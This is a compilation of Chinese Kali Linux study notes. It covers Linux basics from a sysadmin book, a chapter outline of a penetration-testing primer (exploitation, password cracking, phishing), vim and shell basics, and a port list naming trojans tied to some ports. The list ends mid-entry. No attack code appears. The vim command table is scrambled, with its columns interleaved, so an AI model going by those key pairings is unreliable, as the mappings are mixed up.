Kali linux学习笔记

【读书笔记】Linux系统管理初学者指南读书笔记1——第1-2章本博客记录⼀下《Linux系统管理初学者指南》这本书的读书笔记，最近由于想做⼀些关于嵌⼊式的项⽬，所以需要对Linux系统进⾏学习，正好之前买过这本书，内容还可以，能作为⼊门阅读第1章了解并安装Linux系统Linux系统的发展与特点Linux的发展历史Multics计划UNIX系统：1970年为UNIX元年，1970年1⽉1⽇0:00在UNIX系统中作为计算机时间的起点类UNIX操作系统MINIX系统Linux系统：Linus系统内核：负责完成操作系统基本功能的程序，主要作⽤是负责统⼀管理计算机中的硬件资源，提供⽤户擦操作界⾯，提供应⽤程序的运⾏环境Linux系统中的内核程序称为KernelGNU计划：世界知名的⾃由软件项⽬，决定了Linux系统⾃由、开放的属性Kernel作为Linux系统的核⼼，只能实现系统的基本功能，⽽⼀个完整的Linux系统应该包括Kernel和应⽤程序两部分，⽽⽆论是Kernel还是Linux，其中的绝⼤部分应⽤程序属于GNU计划，遵守GNU计划中的GPL或LGPL协议Linux的发⾏版本：作为⽤户使⽤的都是运⾏在内核之上的各种应⽤程序，很多公司或组织在Linux内核的基础上添加了各种管理⼯具和应⽤软件，构成了⼀个完整的操作系统将系统内核和应⽤软件封装在⼀起的操作系统成为Linux发⾏版，⼀般平时接触和使⽤的Linux系统都是Linux的发⾏版RedHat LinuxFedoraRHEL(RedHat Enterprise Linux)CentOS(Community Enterprise Operation System，社区企业操作系统)DebianUbuntuKali LinuxSUSELinux系统较为⼴泛的应⽤是⽹络服务器以及各种嵌⼊式系统在VMware Workstation安装虚拟机设置虚拟机的⽹络环境：桥接(bridged)模式：虚拟机像是⼀个独⽴主机，与物理主机是同等地位，可以通过物理主机的⽹卡访问外⽹，外部⽹络中的计算机也可以访问此虚拟机，桥接模式对应的虚拟⽹络名称为VMnet0仅主机(host-only)模式：仅主机模式对应的是虚拟⽹络VMnet1，这是⼀个独⽴的虚拟⽹络，与物理⽹络之间是隔离开的，所有设为仅主机模式的虚拟机之间以及虚拟机与物理主机之间可以相互通信，但它们与外部⽹络中的主机⽆法通信NAT(⽹络地址转换)模式：NAT模式对应的虚拟⽹络是VMnet8，物理主机就像⼀台⽀持NAT功能的代理服务器，⽽虚拟机就像NAT的客户端⼀样，虚拟机可以使⽤物理主机的IP地址直接访问外部⽹络中的计算机，但由于NAT技术的特点，外部⽹络中的计算机⽆法主动与NAT模式下的虚拟机进⾏通信Linux系统的基本操作⼀个完整的Linux系统是由Kernel和各种应⽤软件组成的，Linux系统的桌⾯环境(X Window)也是由应⽤软件来提供的，负责X Window桌⾯环境的软件主要有两个：GNOME和KDEX Window只是Linux系统的⼀个应⽤软件，并没有集成到Linux的内核中，因此⽤户可以根据需要选择是否运⾏图形界⾯ShellLinux系统的字符界⾯称为Shell(Shell本来是指系统的⽤户界⾯，为⽤户与系统内核进⾏交互操作提供了⼀种接⼝，图形界⾯和字符界⾯都属于Shell，图形界⾯的Shell称为GUI，字符界⾯的Shell称为CLI，由于Linux系统的操作以字符界⾯为主，因此Shell通常专指CLI)Shell是Linux系统中的⼀个应⽤程序，将⽤户输⼊的命令解释成系统内核能理解的语⾔，命令执⾏后再将结果以⽤户可以理解的⽅式显⽰出来Linux系统中负责提供Shell功能的软件有很多，⽐如sh、Csh、Zsh和Bash等，CentOS系统中默认使⽤的是Bash启动ShellLinux是⼀个多⽤户操作系统，可以同时接受多个⽤户登陆，⽽且还允许同⼀个⽤户从不同的终端进⾏多次登陆，在使⽤安装Linux系统的计算机时，虽然⽤户⾯对的也是⼀个物理终端设备，但可以在这⼀个物理终端上通过虚拟终端打开多个互不⼲扰，独⽴⼯作的页⾯Linux中提供的虚拟终端默认有6个，其中第1个是图形界⾯，第2-6个则是字符界⾯，可以通过Ctrl+Alt+F1-F6在不同的虚拟终端进⾏切换，同时在字符界⾯下执⾏startx命令也可以进⼊图形界⾯(在Ubuntu中Ctrl+Alt+F1-F6代表不同的虚拟终端，⽽Ctrl+Alt+F7则是返回图形界⾯，书中描述的是CentOS)虚拟终端的缩写为tty，执⾏tty命令就可显⽰⽤户⽬前所在的终端编号除了虚拟终端外，还有⼀种启动Shell的⽅式称为伪终端，缩写为pts，在图形界⾯中，右键打开终端即可弹出⼀个运⾏在图形环境中的字符界⾯窗⼝，这就是⼀个伪终端，在其中执⾏tty命令，其中的结果为/dev/pts/0，表⽰这是系统启动的第⼀个伪终端(伪终端的编号从0开始)启动Shell后，可以看到类似于zyh@zyh-virtual-machine:~$的命令提⽰符，命令提⽰符是Linux字符界⾯的标志zyh：表⽰当前登录的⽤户账户zyh-virtual-machine：表⽰本机的主机名是⼀个特殊符号，泛指⽤户的家⽬录)：表⽰⽤户当前所在的位置，即⼯作⽬录($：表⽰当前登录的是普通⽤户，如果是管理员⽤户则变为#可以通过Ctrl+C键发出中断信号来中断命令的运⾏Shell命令格式Shell命令由命令名、选项和参数共3个部分组成：命令名 [选项] [参数](命令名、选项和参数之间必须⽤空格分隔)命令名：描述命令功能的英⽂单词或缩写选项：调节命令的具体功能选项通常以-开头，当有多个选项时，可以只使⽤⼀个-符号部分选项以--开头，这些选项通常是⼀个单词或词组少数命令的选项不需要-符号参数：命令的处理对象，可以是⽂件、⽬录或⽤户账号等内容在Shell中，⼀⾏可以输⼊多条命令，命令之间⽤分号分隔，如果在⼀⾏命令后加上****符号，就表⽰另起⼀⾏继续输⼊通过上下⽅向键可以找出曾经执⾏过的命令关机与重启命令关机：poweroff重启：rebootshutdown：既可以⽤来关机⼜可以⽤来重启⽴即关闭系统：shutdown -h now⽴即重启系统：shutdown -r now15分钟后关闭系统：shutdown -h +1510分钟后重启系统，并将信息发给登陆到本机中的各⽤户：shutdown -r +10 'The system will be rebooted!!'对于延时运⾏的关机重启操作，可以⽤shutdown -c命令或Ctrl+C组合键取消相⽐于poweroff和reboot命令，shutdown命令在执⾏前会给所有登陆⽤户发送警告信息，因次更加安全第2章⽂件和⽬录管理本章主要介绍⼀些常⽤的Linux系统的⽂件和⽬录管理类命令Linux设计思想⼀切皆⽂件：在Linux系统中，不只数据以⽂件的形式存在，其他资源(包括硬件设备)也被组织为⽂件的形式，例如硬盘以及硬盘中的每个分区在Linux中都被视为⼀个⽂件整个系统由众多的⼩程序组成：整个Linux系统是由众多单⼀功能的⼩程序组成的，每个⼩程序只负责实现某⼀项具体功能，⽐如Linux的绝⼤多数命令，其实各⾃有⼀个相应的⼩程序，如果需要完成⼀项复杂任务，只需将相应的命令组合在⼀起即可尽量避免与⽤户交互：在对系统进⾏管理操作时，要尽量避免⽤户的参与，因为Linux系统主要⽤作服务器的操作系统，在服务器上执⾏的操作最好通过编写脚本程序完成，从⽽⾃动化地完成某些功能使⽤纯⽂本⽂件保存配置信息：如果需要改动系统或程序中的某项功能，只需编辑相应的配置⽂件Linux系统中的⽂件和⽬录Linux的⽬录结构在Windows系统中，为每个磁盘分区分配⼀个盘符，在资源管理器中通过盘符就可以访问相应的分区，每个分区使⽤独⽴的⽂件系统，每个分区都有⼀个根⽬录，如C:\、D:\等Linux系统的绝⼤多数发⾏版遵循FHS(Filesystem Hierarchy Standard)⽂件系统层次化标准，采⽤统⼀的⽬录结构，按照FHS标准，整个Linux⽂件系统是⼀个倒置的树形结构，系统中只存在⼀个根⽬录，所有的⽬录和⽂件都在同⼀个根⽬录下在Linux系统中定位⽂件或⽬录时，使⽤/进⾏分隔(区别于Windows的)，在整个树形⽬录结构中，使⽤/表⽰根⽬录，根⽬录就是Linux⽂件系统的起点，在根⽬录下按照⽤途不同划分有很多⼦⽬录下⾯是遵循FHS标准的典型⽬录结构：以下是CentOS 7中⼀些常见的⽬录及其作⽤：/boot：存放Linux系统启动所必需的⽂件，Kernel被存放在这个⽬录中/etc：存放Linux系统和各种程序的配置⽂件，Linux中的很多操作和配置都是通过修改配置⽂件实现的(类似于Windows系统中的注册表)/dev：存放Linux系统中的硬盘、光驱和⿏标等硬件设备⽂件/bin：存放Linux系统中常⽤的基本命令，任何⽤户都有权限执⾏/sbin：存放Linux系统基本的管理命令，只有管理员权限才可以执⾏/usr：软件的默认安装位置，类似于Windows系统中的Program Files⽬录/home：普通⽤户家⽬录(也称为主⽬录)/root：超级⽤户root的家⽬录/mnt：⼀般是空的，⽤来临时挂载存储设备/media：⽤于系统⾃动挂载可移动存储设备/tmp：临时⽬录，⽤于存放系统或程序运⾏时产⽣的⼀些临时⽂件，可供所有⽤户执⾏写⼊操作pwd(print working directory)命令：⽤于显⽰⽤户当前所在的⼯作⽬录路径/：是Linux系统的根⽬录，也是其他所有⽬录的起点/root：根⽬录下的⼀个⼦⽬录，⽤途是作为管理员root⽤户的家⽬录，家⽬录主要⽤于存放⽤户的各种数据Linux系统中普通⽤户的家⽬录默认集中存放在/home⽬录中，以⽤户名命名cd(change directory)命令：⽤于切换⼯作⽬录单纯执⾏cd命令，将默认返回到当前⽤户的家⽬录~表⽰当前⽤户的家⽬录cd -可以在最近⼯作过的两个⽬录之间进⾏切换关于路径的⼀些基本概念：绝对路径：以根⽬录/作为起点，可以准确地表⽰⼀个⽂件或⽬录所在的位置相对路径：以当前的⽬录为起点，在开头不使⽤/符号，输⼊的时候更加简单.：表⽰当前⽬录..：表⽰当前⽬录的上⼀级⽬录⽂件和⽬录操作命令ls(list)命令：以列表的⽅式显⽰⼀个⽬录中包含的内容ls显⽰结果以不同的颜⾊来区分⽂件类别，蓝⾊代表⽬录，灰⾊代表普通⽂件，绿⾊代表可执⾏⽂件，红⾊代表压缩⽂件，浅蓝⾊代表链接⽂件touch命令：⽤于创建空⽂件或修改已有⽂件的时间戳mkdir(make directory)命令：⽤于创建新的空⽬录rmdir(remove directory)命令：可以删除指定的⽬录(必须是空⽬录，没有任何⽂件和⼦⽬录)cp(copy)命令：复制⽂件或⽬录cp [选项] 源⽂件或⽬录⽬标⽂件或⽬录mv(move)命令：⽤于移动⽂件或对⽂件重命名mv [选项] 源⽂件或⽬录⽬标⽂件或⽬录rm(remove)命令：删除⽂件或⽬录-f选项：强制删除，⽆须⽤户确认-r选项：递归删除整个⽬录⽂件内容操作命令cat(concatenate)命令：⽤于查看⽂本⽂件内容more命令和less命令：分页显⽰⽂件内容head命令和tail命令：显⽰⽂件开头或末尾的部分内容wc命令：⽤于统计⽂件中的⾏数、单词数和字节数echo命令：⽤于输出指定的字符串或变量的值在变量名称加前导符号$，可以引⽤⼀个变量的值grep命令：⽤于在⽂本⽂件中查找并显⽰包含指定字符串的所有⾏diff命令：⽤于⽐较多个⽂本⽂件之间的差异⽇期和时间的相关命令date命令：显⽰或修改⽇期和时间⽂件查找命令locate命令：简单快速的⽂件查找命令find命令：强⼤的⽂件查找命令，可以实现的⽂件的精确查找xargs命令：find辅助命令内部命令和外部命令Linux系统中的命令总体上分为内部命令和外部命令两⼤类内部命令：指集成在Shell中的命令，属于Shell中的⼀部分，只要Shell被执⾏，内部命令就⾃动载⼊内存，⽤户可以直接使⽤外部命令：很多的Linux命令独⽴于Shell之外，称为外部命令Linux系统中的绝⼤多数命令属于外部命令，⽽每个外部命令都对应了系统中的⼀个可执⾏的⼆进制程序⽂件，这些⼆进制程序⽂件主要存放在下列⽬录中：普通命令：/bin、/usr/bin和/usr/local/bin管理命令：/sbin、/usr/sbin和/usr/local/sbin其中，普通命令是指所有⽤户都可以执⾏的命令，管理命令则只有管理员root才有权限执⾏，Linux系统默认将外部命令程序⽂件的存放路径保存在⼀个名为PATH的环境变量中type命令：判断⼀个命令是内部命令还是外部命令which命令：查找外部命令所对应的的程序⽂件其他辅助命令ln命令：⽤于为⽂件或⽬录建⽴快捷⽅式(Linux系统中称为链接⽂件)alias命令：⽤于设置命令别名系统定义的别名命令：ll(相当于ls -l)unalias命令可以取消所设置的别名命令history命令：查看命令历史记录help命令：查看内部命令帮助信息对于外部命令，可以使⽤通⽤命令选项"--help"man命令：查看命令帮助⼿册clear命令：清除当前终端屏幕的内容ctrl+L也有相同的效果其他技巧通配符和扩展符在Linux系统中执⾏命令时，可以通过⼀些特殊符号对多个⽂件进⾏批量操作，从⽽提⾼操作效率通配符：通⽤的匹配信息的符号*：匹配任意数量的任意字符：在相应的位置上匹配单个字符[]：匹配指定范围内的任意单个字符，如[a,b,c]是表⽰a、b、c任意⼀个字符；[a-z]表⽰任意⼀个⼩写字母扩展符：在扩展符({})中可以包含⼀个以逗号分隔的列表，并将其⾃动展开为多个路径或⽂件名管道符|通过管道符|可以把多个简单的命令连接起来以实现更加复杂的功能，管道符⽤于连接左右两个命令，将|左边命令的执⾏结果作为|右边命令的输⼊命令的换⾏Linux命令⾏需要换⾏可以使⽤\，出现>时可以继续输⼊命令。

KaliLinux渗透测试入门第一章：渗透测试概述在网络安全领域中，渗透测试（Penetration Testing）是一种通过模拟黑客攻击的手段来评估系统和网络的安全性的活动。

Kali Linux是一种专注于渗透测试的操作系统，为渗透测试人员提供了广泛的工具和资源。

本章将介绍渗透测试的基本概念、流程和Kali Linux的重要性。

第二章：Kali Linux基础知识Kali Linux是基于Debian的Linux发行版，它内置了许多用于渗透测试和漏洞利用的工具。

本章将介绍Kali Linux的基础知识，包括安装、配置和常见的命令行操作。

第三章：信息收集在进行渗透测试之前，渗透测试人员首先需要收集目标系统和网络的信息。

本章将介绍Kali Linux中用于信息收集的工具和技术，如端口扫描、漏洞扫描、网络嗅探等。

第四章：漏洞利用漏洞利用是渗透测试的重要一步，通过利用系统和应用程序中的漏洞，攻击者可以获取敏感信息或控制目标系统。

本章将介绍Kali Linux中的漏洞利用工具和技术，如Metasploit框架、SQL注入、远程代码执行等。

第五章：密码破解密码是系统和应用程序的重要保护措施，但是弱密码会给黑客提供入口。

本章将介绍Kali Linux中用于密码破解的工具和技术，如暴力破解、字典攻击、脆弱密码挖掘等。

第六章：无线网络渗透无线网络是现代网络环境中常见的一种网络连接方式，但也容易受到黑客攻击。

本章将介绍Kali Linux中用于无线网络渗透的工具和技术，如WiFi密码破解、无线网络嗅探、中间人攻击等。

第七章：社交工程社交工程是一种通过欺骗和操纵人的心理来获取机密信息的攻击方式。

本章将介绍Kali Linux中的社交工程工具和技术，如钓鱼攻击、恶意邮件、恶意链接等。

第八章：综合渗透测试示例本章将通过一个综合的渗透测试示例来展示Kali Linux的使用和渗透测试的流程。

从信息收集到漏洞利用再到权限提升，读者将能够了解整个渗透测试的过程。

渗透利器（第⼀章-2）kalilinux基础命令讲解介绍认识Linux什么是shellshell与终端的区别Linux常⽤命令Linux中⽂件与⽬录的权限什么是shell在计算机科学中，shell俗称外壳（⽤来区别于内核），它类似于windows的dos，能够接收⽤户的命令并翻译给操作系统执⾏，是⽤户与操作系统（内核）之间的桥梁查看shell查看系统⽀持那些shellcat/etc/shells查看正在使⽤的shellecho $SHELLshell与终端的区别终端：接受⽤户的输⼊，并传递给shell程序，接受程序输出并展⽰到屏幕shell：接受并解析⽤户的命令给操作系统执⾏，将结果输出到终端使⽤vim编辑器VM编辑器是所有Unix及Linux系统下标准的编辑器，他就相当于windows系统中的记事本⼀样，它的强⼤不逊⾊于任何最新的⽂本编辑器。

他是我们使⽤Linux系统不能缺少的⼯具。

vim具有程序编辑的能⼒，可以以字体颜⾊辨别语法的正确性，⽅便程序设计;vim可以当作vi的升级版本，他可以⽤多种颜⾊的⽅式来显⽰⼀些特殊的信息。

vim会依据⽂件扩展名或者是⽂件内的开头信息，判断该⽂件的内容⽽⾃动的执⾏该程序的语法判断式，再以颜⾊来显⽰程序代码与⼀般信息。

vim⾥⾯加⼊了很多额外的功能，例如⽀持正则表达式的搜索、多⽂件编辑、块复制等等。

这对于我们在Linux上进⾏⼀些配置⽂件的修改⼯作时是很棒的功能。

vi/vim编辑器模式命令模式(默认):刚进⼊vim的时候，默认就是命令模式，可以复制⾏，删除⾏等。

输⼊模式- +命令模式 ESC键输⼊模式:可以输⼊内容。

关闭、保存⽂件模式转换 shift键+:号使⽤insert键切换进⼊输⼊模式命令模式下:命令模式-→输⼊模式:W:保存.i:在当前光标所在字符的前⾯，转为输⼊模式 q:退出I:在当前光标所在⾏的⾏⾸转换为输⼊模式 wq和x都是保存退出a:在当前光标所在字符的后⾯，转为输⼊模式 q! :强制退出A:在光标所在⾏的⾏尾，转换为输⼊模式 w! :强制保存，管理员才有权限o:在当前光标所在⾏的下⽅，新建⼀⾏,并转为输⼊模式0:在当前光标所在⾏的上⽅，新建-⾏,并转为输⼊模式查找s:删除光标所在字符普通模式:r:替换光标处字符 /PATTERN:从当前位置向后查找PATTERN: 从当前位置向前查找date命令date命令⽤于显⽰及设置系统的时间或⽇期，格式为“date [选项] [+指定的格式]”。

kalilinux学习笔记（四）：⽹络端⼝⼤全介绍端⼝⼤全介绍2端⼝：管理实⽤程序3端⼝：压缩进程5端⼝：远程作业登录7端⼝：回显9端⼝：丢弃11端⼝：在线⽤户13端⼝：时间17端⼝：每⽇引⽤18端⼝：消息发送协议19端⼝：字符发⽣器20端⼝：FTP⽂件传输协议(默认数据⼝)21端⼝：FTP⽂件传输协议(控制)22端⼝：SSH远程登录协议23端⼝：telnet(终端仿真协议),⽊马Tiny Telnet Server开放此端⼝24端⼝：预留给个⼈⽤邮件系统25端⼝：SMTP服务器所开放的端⼝，⽤于发送邮件27端⼝：NSW ⽤户系统 FE29端⼝：MSG ICP31端⼝：MSG验证,⽊马Master Paradise、HackersParadise开放此端⼝33端⼝：显⽰⽀持协议35端⼝：预留给个⼈打印机服务37端⼝：时间38端⼝：路由访问协议39端⼝：资源定位协议41端⼝：图形42端⼝：主机名服务43端⼝：who is服务44端⼝：MPM(消息处理模块)标志协议45端⼝：消息处理模块46端⼝：消息处理模块(默认发送⼝)47端⼝：NI FTP48端⼝：数码⾳频后台服务49端⼝：TACACS登录主机协议50端⼝：远程邮件检查协议51端⼝：IMP(接⼝信息处理机)逻辑地址维护53端⼝：dns域名服务器54端⼝：施乐⽹络服务系统票据交换55端⼝：ISI图形语⾔56端⼝：施乐⽹络服务系统验证57端⼝：预留个⼈⽤终端访问58端⼝：施乐⽹络服务系统邮件59端⼝：预留个⼈⽂件服务60端⼝：未定义61端⼝：NI邮件62端⼝：异步通讯适配器服务63端⼝：whois++64端⼝：通讯接⼝65端⼝：TACACS数据库服务66端⼝：Oracle SQL*NET67端⼝：引导程序协议服务端68端⼝：引导程序协议客户端69端⼝：⼩型⽂件传输协议70端⼝：信息检索协议71端⼝：远程作业服务72端⼝：远程作业服务73端⼝：远程作业服务74端⼝：远程作业服务75端⼝：预留给个⼈拨出服务76端⼝：分布式外部对象存储77端⼝：预留给个⼈远程作业输⼊服务78端⼝：修正TCP79端⼝：查询远程主机在线⽤户等信息80端⼝：http,⽤于⽹页浏览,⽊马Executor开放此端⼝81端⼝：HOST2名称服务82端⼝：传输实⽤程序83端⼝：模块化智能终端ML设备84端⼝：公⽤追踪设备85端⼝：模块化智能终端ML设备86端⼝：Micro Focus Cobol编程语⾔87端⼝：预留给个⼈终端连接88端⼝：Kerberros安全认证系统89端⼝：SU/MIT telnet(终端仿真⽹关)90端⼝：DNSIX 安全属性标记图92端⼝：⽹络打印协议93端⼝：设备控制协议94端⼝：Tivoli对象调度96端⼝：DIXIE协议规范97端⼝：快速远程虚拟⽂件协议98端⼝：TAC新闻协议99端⼝：后门程序ncx99开放此端⼝100端⼝：未知⽤途101端⼝：NIC 主机名称服务102端⼝：消息传输代理103端⼝：Genesis 点对点传输⽹络105端⼝：信箱名称服务106端⼝：3COM-TSMUX开放端⼝107端⼝：远程Telnet服务108端⼝：SNA ⽹关访问服务109端⼝：POP2服务器开放此端⼝,⽤于接收邮件110端⼝：POP3服务器开放此端⼝,⽤于接收邮件111端⼝：SUN公司的RPC服务所有端⼝112端⼝：McIDAS 数据传输协议113端⼝：认证服务，⽤于鉴别TCP连接的⽤户114端⼝：⾳频新闻多点服务115端⼝：简单⽂件传输服务116端⼝：ANSA REX 通知117端⼝：UUCP 路径服务118端⼝：SQL 服务119端⼝：NEWS新闻组传输协议，承载USENET通信121端⼝：⽊马BO jammerkillahV开放端⼝122端⼝：SMAKY⽹络123端⼝：⽹络时间协议，蠕⾍病毒会利⽤，⼀般关闭128端⼝：GSS X许可认证129端⼝：密码⽣成器协议130端⼝：Cisco软件开放端⼝131端⼝：Cisco软件开放端⼝132端⼝：Cisco软件开放端⼝133端⼝：统计服务134端⼝：INGRES-⽹络服务135端⼝：DCOM服务，冲击波病毒利⽤，不能关闭136端⼝：命名系统138端⼝：NETBIOS协议应⽤，为共享开放139端⼝：NETBIOS协议应⽤，为共享开放140端⼝：EMFIS数据服务141端⼝：EMFIS控制服务143端⼝：Interim邮件访问协议144端⼝：UMA软件开放端⼝145端⼝：UAAC协议149端⼝：AED 512仿真服务150端⼝：SQL(结构化查询语⾔)-⽹络152端⼝：后台⽂件传输协议156端⼝：SQL(结构化查询语⾔)服务158端⼝：PC邮件服务器159端⼝：NSS-路由160端⼝：SGMP-陷阱161端⼝：简单⽹络管理协议162端⼝：SNMP陷阱163端⼝：CMIP/TCP 管理164端⼝：CMIP/TCP 代理166端⼝：Sirius系统169端⼝：发送170端⼝：⽹络附⾔177端⼝：x显⽰管理控制协议，⼊侵者通过它访问X-windows操作台178端⼝：NextStep Window 服务179端⼝：边界⽹关协议180端⼝：图表181端⼝：统⼀184端⼝：OC服务器185端⼝：远程-KIS186端⼝：KIS 协议187端⼝：应⽤通信接⼝189端⼝：队列⽂件传输190端⼝：⽹关进⼊控制协议191端⼝：Prospero ⽬录服务192端⼝：OSU ⽹络监视系统193端⼝：Spider 远程控制协议194端⼝：多线交谈协议197端⼝：⽬录地址服务198端⼝：⽬录地址服务监视器201端⼝：AppleTalk(Mac机所⽤的⽹络协议)路由保证202端⼝：AppleTalk(Mac机所⽤的⽹络协议)Name Binding 203端⼝：AppleTalk(Mac机所⽤的⽹络协议)未⽤端⼝204端⼝：AppleTalk(Mac机所⽤的⽹络协议)回显205端⼝：AppleTalk(Mac机所⽤的⽹络协议)未⽤端⼝206端⼝：AppleTalk(Mac机所⽤的⽹络协议)区信息207端⼝：AppleTalk(Mac机所⽤的⽹络协议)未⽤端⼝208端⼝：AppleTalk(Mac机所⽤的⽹络协议)未⽤端⼝209端⼝：快速邮件传输协议210端⼝：ANSI(美国国家标准协会)Z39.50211端⼝：Texas Instruments 914C/G终端213端⼝：IPX(以太⽹所⽤的协议)218端⼝：Netix消息记录协议219端⼝：Unisys ARPs220端⼝：交互邮件访问协议 v3223端⼝：证书分发中⼼224端⼝：masq拨号器241端⼝：预留端⼝ (224-241)245端⼝：链接246端⼝：显⽰系统协议257端⼝：安全电⼦交易系统258端⼝：Yak Winsock 个⼈聊天259端⼝：有效短程遥控260端⼝：开放端⼝261端⼝：IIOP 基于TLS/SSL的命名服务266端⼝：SCSI(⼩型计算机系统接⼝)on ST267端⼝：Tobit David服务层268端⼝：Tobit David复制281端⼝：个⼈连结282端⼝：Cable端⼝A/X286端⼝：FXP通信308端⼝：Novastor备份313端⼝：Magenta逻辑318端⼝：PKIX时间标记333端⼝：Texar安全端⼝344端⼝：Prospero数据存取协议345端⼝：Perf分析⼯作台346端⼝：Zebra服务器348端⼝：Cabletron管理协议358端⼝：Shrink可上⽹家电协议359端⼝：⽹络安全风险管理协议362端⼝：SRS发送363端⼝：RSVP隧道372端⼝：列表处理373端⼝：Legend公司374端⼝：Legend公司376端⼝：AmigaEnvoy⽹络查询协议377端⼝：NEC公司378端⼝：NEC公司379端⼝：TIA/EIA/IS-99调制解调器客户端380端⼝：TIA/EIA/IS-99调制解调器服务器381端⼝：hp(惠普)性能数据收集器382端⼝：hp(惠普)性能数据控制节点383端⼝：hp(惠普)性能数据警报管理384端⼝：远程⽹络服务器系统385端⼝：IBM应⽤程序386端⼝：ASA信息路由器定义⽂件.387端⼝：Appletalk更新路由.389端⼝：轻型⽬录访问协议395端⼝：⽹络监视控制协议396端⼝：Novell(美国Novell公司)Netware(Novell公司出的⽹络操作系统)over IP 400端⼝：⼯作站解决⽅案401端⼝：持续电源402端⼝：Genie协议406端⼝：交互式邮件⽀持协议408端⼝：Prospero资源管理程序409端⼝：Prospero资源节点管理.410端⼝：DEC(数据设备公司)远程调试协议411端⼝：远程MT协议412端⼝：陷阱协定端⼝413端⼝：存储管理服务协议414端⼝：信息查询415端⼝：B⽹络423端⼝：IBM操作计划和控制开端424端⼝：IBM操作计划和控制追踪425端⼝：智能计算机辅助设计434端⼝：移动ip代理435端⼝：移动ip管理443端⼝：基于TLS/SSL的⽹页浏览端⼝，能提供加密和通过安全端⼝传输的另⼀种HTTP 444端⼝：简单⽹络内存分页协议445端⼝：Microsoft-DS，为共享开放，震荡波病毒利⽤，⼀般应关闭446端⼝：DDM-远程关系数据库访问447端⼝：DDM-分布式⽂件管理448端⼝：DDM-使⽤安全访问远程数据库456端⼝：⽊马HACKERS PARADISE开放此端⼝458端⼝：apple quick time软件开放端⼝459端⼝：ampr-rcmd命令464端⼝：k密码服务469端⼝：⼴播控制协议470端⼝：scx-代理472端⼝：ljk-登陆481端⼝：Ph服务487端⼝：简单异步⽂件传输489端⼝：nest-协议491端⼝：go-登陆499端⼝：ISO ILL协议500端⼝：Internet密钥交换，Lsass开放端⼝，不能关闭509端⼝：陷阱510端⼝：FirstClass协议512端⼝：远程进程执⾏513端⼝：远程登陆514端⼝：cmd命令515端⼝：spooler516端⼝：可视化数据518端⼝：交谈519端⼝：unix时间520端⼝：扩展⽂件名称服务器525端⼝：时间服务526端⼝：新⽇期529端⼝：在线聊天系统服务530端⼝：远程过程调⽤531端⼝：聊天532端⼝：读新闻533端⼝：紧急⼴播端⼝537端⼝：⽹络流媒体协议542端⼝：商业543端⼝：Kerberos(软件)v4/v5544端⼝：krcmd命令546端⼝：DHCPv6 客户端547端⼝：DHCPv6 服务器552端⼝：设备共享554端⼝：Real Time Stream控制协议555端⼝：⽊马PhAse1.0、Stealth Spy、IniKiller开放此端⼝556端⼝：远距离⽂件服务器563端⼝：基于TLS/SSL的⽹络新闻传输协议564端⼝：plan 9⽂件服务565端⼝：whoami查询566端⼝：streettalk567端⼝：banyan-rpc(远程过程调⽤)568端⼝：DPA成员资格569端⼝：MSN成员资格570端⼝：demon(调试监督程序)571端⼝：udemon(调试监督程序)572端⼝：声纳573端⼝：banyan-贵宾574端⼝：FTP软件代理系统581端⼝：Bundle Discovery 协议582端⼝：SCC安全583端⼝：Philips视频会议584端⼝：密钥服务器585端⼝：IMAP4+SSL (Use 993 instead)586端⼝：密码更改587端⼝：申请589端⼝：Eye连结595端⼝：CAB协议597端⼝：PTC名称服务598端⼝：SCO⽹络服务器管理3599端⼝：Aeolon Core协议600端⼝：Sun IPC(进程间通讯)服务器601端⼝：可靠系统登陆服务604端⼝：通道606端⼝：Cray统⼀资源管理609端⼝：npmp-陷阱610端⼝：npmp-本地611端⼝：npmp-gui( 图形⽤户界⾯)612端⼝：HMMP指引613端⼝：HMMP操作614端⼝：SSL(加密套接字协议层)shell(壳)615端⼝：Internet配置管理616端⼝：SCO(Unix系统)系统管理服务器617端⼝：SCO桌⾯管理服务器619端⼝：Compaq(康柏公司)EVM620端⼝：SCO服务器管理623端⼝：ASF远程管理控制协议624端⼝：Crypto管理631端⼝：IPP (Internet打印协议)633端⼝：服务更新(Sterling软件)637端⼝：局域⽹服务器641端⼝：repcmd命令647端⼝：DHCP(动态主机配置协议)Failover648端⼝：注册登记协议(RRP)649端⼝：Cadview-3d软件协议666端⼝：⽊马Attack FTP、Satanz Backdoor开放此端⼝808端⼝：ccproxy http/gopher/ftp (over http)协议1001端⼝：⽊马Silencer，WebEx开放端⼝1011端⼝：⽊马Doly开放端⼝1024端⼝：动态端⼝的开始,⽊马yai开放端⼝1025端⼝：inetinfo.exe(互联⽹信息服务)⽊马netspy开放端⼝1026端⼝：inetinfo.exe(互联⽹信息服务)1027端⼝：应⽤层⽹关服务1030端⼝：应⽤层⽹关服务1031端⼝：BBN IAD1033端⼝：本地⽹络信息端⼝1034端⼝：同步通知1036端⼝：安全部分传输协议1070端⼝：⽊马Psyber Stream，Streaming Audio开放端⼝1071端⼝：⽹络服务开放端⼝1074端⼝：⽹络服务开放端⼝1080端⼝：Socks这⼀协议以通道⽅式穿过防⽕墙，允许防⽕墙后⾯的⼈通过⼀个IP地址访问INTERNET 1110端⼝：卡巴斯基反病毒软件开放此端⼝1203端⼝：许可证⽣效端⼝1204端⼝：登陆请求监听端⼝1206端⼝：Anthony数据端⼝1222端⼝：SNI R&D⽹络端⼝1233端⼝：普遍的附录服务器端⼝1234端⼝：⽊马SubSeven2.0、Ultors Trojan开放此端⼝1243端⼝：⽊马SubSeven1.0/1.9开放此端⼝1245端⼝：⽊马Vodoo，GabanBus，NetBus，Vodoo开放此端⼝1273端⼝：EMC-⽹关端⼝1289端⼝：JWalk服务器端⼝1290端⼝：WinJa服务器端⼝1333端⼝：密码策略(⽹络服务)(svchost.exe)1334端⼝：⽹络服务(svchost.exe)1335端⼝：数字公正协议1336端⼝：即时聊天协议(svchost.exe)1349端⼝：注册⽹络协议端⼝1350端⼝：注册⽹络协议端⼝1371端⼝：富⼠通配置协议端⼝1372端⼝：富⼠通配置协议端⼝1374端⼝：EPI软件系统端⼝1376端⼝：IBM个⼈-个⼈软件端⼝1377端⼝：Cichlid许可证管理端⼝1378端⼝：Elan许可证管理端⼝1380端⼝：Telesis⽹络许可证管理端⼝1381端⼝：苹果⽹络许可证管理端⼝1386端⼝：CheckSum 